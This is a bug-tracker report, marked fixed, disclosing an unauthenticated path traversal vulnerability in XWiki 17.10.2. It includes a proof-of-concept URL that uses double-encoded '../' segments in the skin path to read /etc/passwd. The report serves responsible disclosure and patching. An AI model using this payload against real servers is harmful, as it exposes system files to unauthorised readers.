Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
17.10.2
-
Xwiki version: 17.10.2
Jetty version: 12.1.5
-
Integration
-
Unknown
-
N/A
-
N/A
-
-
8.2
Description
Hello XWiki team,
I found an Unauthenticate Path Traversal vulnerability in XWIKI platform.
Please check and register a CVE for me if this bug is valid.
Enviroment:
- Xwiki version: 17.10.2
- Jetty version: 12.1.5
Step to POC:
- Access URL: http://[host]/xwiki/bin/skin/..%252f/..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd
- Response

Attachments
Issue Links
- depends on
-
XCOMMONS-3594 Make a lot easier to protect against resource path traversal
-
- Closed
-
- links to